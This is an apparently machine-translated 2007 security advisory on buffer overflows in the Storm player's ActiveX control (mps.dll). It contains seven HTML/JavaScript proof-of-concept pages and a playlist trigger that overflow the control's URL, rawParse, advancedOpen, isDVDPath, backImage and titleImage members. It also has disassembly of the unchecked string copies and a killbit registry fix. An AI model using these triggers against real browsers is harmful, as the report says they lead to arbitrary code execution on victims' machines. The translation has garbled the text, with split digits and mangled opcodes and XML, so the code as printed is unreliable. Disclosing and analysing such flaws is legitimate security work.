Storm 2 mps. the dll component multiple buffer overflow vulnerabilities-vulnerability warning-the black bar safety net

2007-09-10T00:00:00
ID MYHACK58:62200716858
Type myhack58
Reporter 佚名
Modified 2007-09-10T00:00:00

Description

Online burst a storm of the activex vulnerability, the call is rawParse this method, so simple to see, found the problem quite a bit. These issues are able to control eip or seh, that is each vulnerability can lead to arbitrary code execution.

Affected versions: storm 2(other not tested) Unaffected versions: without(currently without D)

URL attributes, rawParse method and the advancedOpen method overflow poc are as follows:

[Vuln 1] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 3 0 0) { s += "\x0c"; }

storm. URL = s; </script> </body> </html>

[Vuln 2] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 3 0 0) { s += "\x0c"; }

storm. rawParse(s); </script> </body> </html>

[Vuln 3] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 1 0 5 0) { s += "\x0c"; }

storm. advancedOpen(s, ""); </script> </body> </html>

URL attributes, rawParse method and the advancedOpen method of overflow is essentially the same problem, they are called sparser. dll export a function. This function from the code point of view is the processing path and URL, the URL property and rawParse method incoming parameters are also URL. . text:10004F40 ; int __stdcall sub_10004F40(LPCSTR lpMultiByteStr,int,int) . text:10004F40 sub_10004F40 proc near ; DATA XREF: . rdata:1000F2D0o . text:10004F40 . text:10004F40 var_14 = dword ptr-14h . text:10004F40 var_10 = dword ptr-10h . text:10004F40 var_C = dword ptr-0Ch . text:10004F40 var_4 = dword ptr -4 . text:10004F40 lpMultiByteStr = dword ptr 4 . text:10004F40 arg_8 = dword ptr 0Ch . text:10004F40 . text:10004F40 mov eax, large fs:0 . text:10004F46 push 0FFFFFFFFh . text:10004F48 push offset loc_1000EB21 . text:10004F4D push eax ... ... ... ... . text:1000506D call dword ptr [ecx+4] . text:1 0 0 0 5 0 7 0 mov ecx, esi . text:1 0 0 0 5 0 7 2 mov edx, [esp+24h+lpMultiByteStr] . text:1 0 0 0 5 0 7 6 push edx ; lpMultiByteStr . text:1 0 0 0 5 0 7 7 call sub_10002450

The function of the second, three parameters are a pointer to the user input string to a copy of the pointer, the last line into another function: . text:1 0 0 0 2 4 5 0 ; int __stdcall sub_10002450(LPCSTR lpMultiByteStr) . text:1 0 0 0 2 4 5 0 sub_10002450 proc near ; CODE XREF: sub_10004F40+137p . text:1 0 0 0 2 4 5 0 . text:1 0 0 0 2 4 5 0 var_12C = dword ptr-12Ch . text:1 0 0 0 2 4 5 0 pszPath = byte ptr-120h . text:1 0 0 0 2 4 5 0 var_1C = dword ptr-1Ch . text:1 0 0 0 2 4 5 0 var_4 = dword ptr -4 . text:1 0 0 0 2 4 5 0 lpMultiByteStr = dword ptr 8 . text:1 0 0 0 2 4 5 0 . text:1 0 0 0 2 4 5 0 push ebp . text:1 0 0 0 2 4 5 1 mov ebp, esp . text: 1 0 0 0 2 4 5 3 sub esp, 120h ; note here allocated 120h i.e., 2 8 8 byte size of the buffer ... ... ... ... . text:100024ED mov edi, [ebp+lpMultiByteStr] . text:100024F0 push edi ; pszPath . text: 100024F1 call ds:PathIsURLA ; here to determine whether as a legitimate URL . text:100024F7 test eax, eax . text: 100024F9 jz loc_10002582 ; if not then jump ... ... ... ... . text:1 0 0 0 2 5 8 2 lea eax, [ebp+pszPath] . text: 1 0 0 0 2 5 8 8 push edi ; user input string . text:1 0 0 0 2 5 8 9 push eax . text: 1000258A call ds:lstrcpyA ; string copy to cause a stack overflow Through the above analysis found that the program in dealing with illegal Extra-Long(length greater than MAX_PATH)the URL occurs when the stack overflows. This function is a derived function, storm other places if you call this function while there may be a problem. So in this function a lower-off point now storm the main program when processing the URL is also calling this function, the same is also a problem. We constructed a playlist file can be triggered:

[Vuln 4] <? xml version="1.0" encoding="GB2312"?& gt; <PlayList> <item name="ph4nt0m" time="" path=""/> </PlayList>

But the problem is far from over, in the mps. dll, there is also obviously the following vulnerabilities:

IsDVDPath method: 037EAB8B 5 6 PUSH ESI 037EAB8C 5 7 PUSH EDI 037EAB8D 5 0 PUSH EAX ; src 037EAB8E 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-1 1 0] ; dest 037EAB94 6 8 30FE8003 PUSH mps. 0380FE30 ; ASCII "%s\video_ts. ifo" 037EAB99 5 0 PUSH EAX 037EAB9A E8 F2FA0000 CALL the mps. 037FA691 ; copy

[Vuln 5] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 1 0 5 0) { s += "\x0c"; }

storm. isDVDPath(s); </script> </body> </html>

backImage properties: 03FA6D5B . 8D9E 0C030000 LEA EBX,DWORD PTR DS:[ESI+30C] <=========== 03FA6D84 . FF75 F0 PUSH DWORD PTR SS:[EBP-1 0] ; /String2 03FA6D87 . 8 9 8 6 0 8 0 3 0 0 0 0 MOV DWORD PTR DS:[ESI+3 0 8],EAX ; | 03FA6D8D . 5 3 PUSH EBX ; |String1 03FA6D8E . FF15 5471FC03 CALL DWORD PTR DS:[<&KERNEL32. lstrcpyA>] ; \lstrcpyA 03FA6D94 > 8B86 3 4 0 4 0 0 0 0 MOV EAX,DWORD PTR DS:[ESI+4 3 4] 03FA6D9A . 8D8E 3 4 0 4 0 0 0 0 LEA ECX,DWORD PTR DS:[ESI+4 3 4] <=========== 03FA6DA0 . 894D 0C MOV DWORD PTR SS:[EBP+C],ECX 03FA6DA3 . FF50 0 TO 4 CALL DWORD PTR DS:[EAX+4]

[Vuln 6] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 1 0 5 0) { s += "\x0c"; }

storm. backImage = s; </script> </body> </html>

titleImage attribute: 03EA68E7 . FF75 F0 PUSH DWORD PTR SS:[EBP-1 0] ; /String2 03EA68EA . 8 9 0 3 MOV DWORD PTR DS:[EBX],EAX ; | 03EA68EC . 8D86 A4010000 LEA EAX,DWORD PTR DS:[ESI+1A4] ; | 03EA68F2 . 5 0 PUSH EAX ; |String1 03EA68F3 . FF15 5471EC03 CALL DWORD PTR DS:[<&KERNEL32. lstrcpy>; \lstrcpyA 03EA68F9 > 8B86 C8020000 MOV EAX,DWORD PTR DS:[ESI+2C8] 03EA68FF . 8D9E C8020000 LEA EBX,DWORD PTR DS:[ESI+2C8] 03EA6905 . 8BCB MOV ECX,EBX 03EA6907 . 895D 0C MOV DWORD PTR SS:[EBP+C],EBX 03EA690A . FF50 0 TO 4 CALL DWORD PTR DS:[EAX+4]

[Vuln 7] <html> <body> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object> <script> var s = "\x0c";

while (s. length < 1 0 5 0) { s += "\x0c"; }

storm. titleImage = s; </script> </body> </html>

For the control vulnerabilities temporary solution is to of the com the formation of set the killbit, put the following content is saved as. reg file, double-click to import the registry: [Patch] Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}] "Compatibility Flags"=dword:0 0 0 0 0 4 0 0 Storm front The period of time declared out of the MPC core, and now most of the code is written. We see the storm in the business rapid development, the version of the rapid update at the same time, bring about the safety of products neglected and left to chance. I've been feeling the storm will have a problem, because he contains too many dll, just which File format to go wrong, it will lead to serious vulnerabilities. These vulnerabilities are probably just the tip of the iceberg, continue to dig down, maybe will find something more. Rapid development of enterprise survival is not easy, would like to“storm”along the way.